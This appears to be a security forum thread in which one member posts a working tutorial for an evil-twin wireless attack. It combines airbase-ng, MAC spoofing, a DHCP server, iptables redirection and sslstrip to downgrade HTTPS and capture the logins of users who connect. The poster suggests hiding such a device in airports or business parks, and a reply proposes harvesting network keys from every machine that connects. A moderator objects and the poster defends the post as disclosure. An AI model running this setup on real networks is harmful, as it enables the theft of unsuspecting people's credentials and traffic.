Setting up airbase with sslstrip

[imported_vvpalin]

Ive read so much on airbase and ssl strip its not even funny, yet not once have i seen anyone combine the 2. That seemed rather odd to me as it was the first thing i thought about when i found out about sslstrip. "im a total n00b"

I did this a few weeks ago and it does work, but i must say that even without sslstrip running, the alfa card is crap for this as you cant select the MTU and connecting to the net is agonizingly slow. After a little digging i found out that its because the packet size is enlarged when passed through the tap, and causes it to be fragmented because its to large.

Anyways this is how you do it.

Start airbase

macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airbase-ng -e APCONNECT wlan0

Start and connect to your AP with the second adapter "i set mine to open auth"

macchanger --mac 00:55:44:33:22:11 wlan1
iwconfig wlan1 ap 00:22:22:22:22:22 essid myapname channel 5
dhclient wlan1

Bring up the tap and set the IP

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1500

Put this in your dhcpd.conf file

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}

Start dhcp and set the routing table

dhcpd3 -cf /root/dhcpd.conf at0
echo 1 > /proc/sys/net/ipv4/ip_forward
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.2.1

Now just start up sslstrip on the tap

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
echo "1" > /proc/sys/net/ipv4/ip_forward
python ./sslstrip.py -p -f -l 8080

All you need to do is connect your client to your AP and browse gmail or whatever.

If sslstrip ever gets ported to C or some other decent language, i think it would be really fun to set it up on the FON router. You could couple 2 of them together so that one connects to the AP, the other becomes an AP ... and all the while sslstrip is running "along with dsniff" capping everything.

Its honestly scary how effective that attack would be givin the rite area and a skilled attacker. All an attacker would need to do is get the cert explained in moxies video, add an antenna to one or both of the FON's and put it in a airport or business park with a crafty name.

Not to shabby for this noob

Edit: I just found out btw that you can run python on the FON with the addition of a media card hack

[KMDave]

If sslstrip ever gets ported to C or some other decent language, i think it would be really fun to set it up on the FON router. You could couple 2 of them together so that one connects to the AP, the other becomes an AP ... and all the while sslstrip is running "along with dsniff" capping everything.

Its honestly scary how effective that attack would be givin the rite area and a skilled attacker. Just make sure you do the cert explained in moxies video, add an antenna to one or both of the FON's and put it in a airport or business park with a crafty name.

Not to shabby for this noob

Even though I appreciate you creating a tutorial the last part is not acceptable. You are suggesting to perform an illegal activity here. Please check the forum rules

That last part is quite shabby and very noobish.

[imported_onryo]

Good stuff Vvplalin!
Have you been able to get airbase-ng to work in "-P" mode ie airbase-ng -P -C 30? A really devastating blow would be see this working with harvester.rb and wkv.exe. This will extract the network key off off all machines that connect. The idea being that you don't have to crack a wpa key. It will just be grabbed from every computer that connects to airbase. Do this with airbase in -P mode...wow! Just make sure it is only your machines that connect. Otherwise this could redefine the concept of "wardiving" to an illegal activity. I have started porting SSLstrip to C. I am not the best coder on earth so it can take a while.

onryo

[imported_vvpalin]

Even though I appreciate you creating a tutorial the last part is not acceptable. You are suggesting to perform an illegal activity here. Please check the forum rules

That last part is quite shabby and very noobish.

I am not for one second suggesting anyone do this at all. I have never once done anything illegal and actually look down on those that do.

For the last month or so i have taken on the mindset of an attacker, it has been great fun. While doing this i came up with that idea and i thought i would share as i really have no one else to tell and if not here it would stay locked in my head forever.

If you would like me to delete it i will but it is a serous threat and i think people should be aware of it.

[KMDave]

Sorry maybe I just got it wrong when I read it early that morning.

Nobody is perfect, I am making mistakes too and I apologize for it.

Wasn't meant as an insult at all, but a well meant hint anyway.

Thanks for pointing it out again.

[Archangel-Amael]

I am not for one second suggesting anyone do this at all. I have never once done anything illegal and actually look down on those that do.
For the last month or so i have taken on the mindset of an attacker, it has been great fun. While doing this i came up with that idea and i thought i would share as i really have no one else to tell and if not here it would stay locked in my head forever.
If you would like me to delete it i will but it is a serous threat and i think people should be aware of it.

It should be obvious to you ( and I know it is ) that if someone here thinks you are doing or attempting to do something illegal and or unethical, you will get called on it.
"nuff said. On the other hand full disclosure as was just mentioned in another thread, is important. If it helps make a product or application more secure then I (and others) are all for it, but there is a caveat with that. It must be done appropriately.
Example: finding a zero day and then posting it here before contact with the manufacturer. That would be a big no no. It's alright that you post your ideas( I don't think anyone is against that). If there is something that you may think is questionable an easy thing to do would be to pm the idea/s to someone with more experience or a mod. This can help you to ensure that you are on the "up & up".
As for the deletion part it is kind of late to do so, but if a mod sees it and thinks that it is not appropriate then I am sure they will take care of it.
Cheers

[imported_vvpalin]

Its reworded a little bit as i think the last few lines were the major problem.

Im all for full disclosure, however thats not even in my ballpark yet being how new i am. My ideas are mostly just based on the little things i know and for whatever reason people not connecting the dots.

Thats why im so eager to learn because i honestly think givin enough "training" i can become a serious asset to the security community.

lol anyone want to offer me a job .. ill even work for minimum wage